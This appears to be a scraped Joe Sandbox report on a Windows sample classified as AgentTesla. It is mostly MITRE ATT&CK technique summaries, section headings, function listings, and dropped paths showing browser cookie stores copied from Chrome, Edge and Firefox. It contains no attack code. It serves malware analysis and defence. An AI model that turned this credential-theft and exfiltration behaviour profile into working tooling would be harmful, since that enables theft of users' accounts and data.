Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wva4mZuUb4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wva4mZuUb4.exe.log

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Chrome\Default\Network\Cookies

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Edge Chromium\Default\Network\Cookies

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
wva4mZuUb4.exe

Function 0780401E Relevance: 6.8, Strings: 3, Instructions: 3078
COMMON

Function 077A4535 Relevance: 5.5, Instructions: 5514
COMMON

Function 077A4560 Relevance: 5.5, Instructions: 5499
COMMON

Function 06274A58 Relevance: 5.2, Instructions: 5237
COMMON

Function 08F0C1D8 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Function 0137B848 Relevance: 8.8, Strings: 7, Instructions: 91
COMMON

Function 01378AB0 Relevance: 8.0, Strings: 6, Instructions: 452
COMMON

Function 01375D38 Relevance: 7.7, Strings: 6, Instructions: 186
COMMON

Function 0137B838 Relevance: 6.3, Strings: 5, Instructions: 89
COMMON

Function 014ECB09 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 014ECB18 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0137BDD0 Relevance: 5.5, Strings: 4, Instructions: 485
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre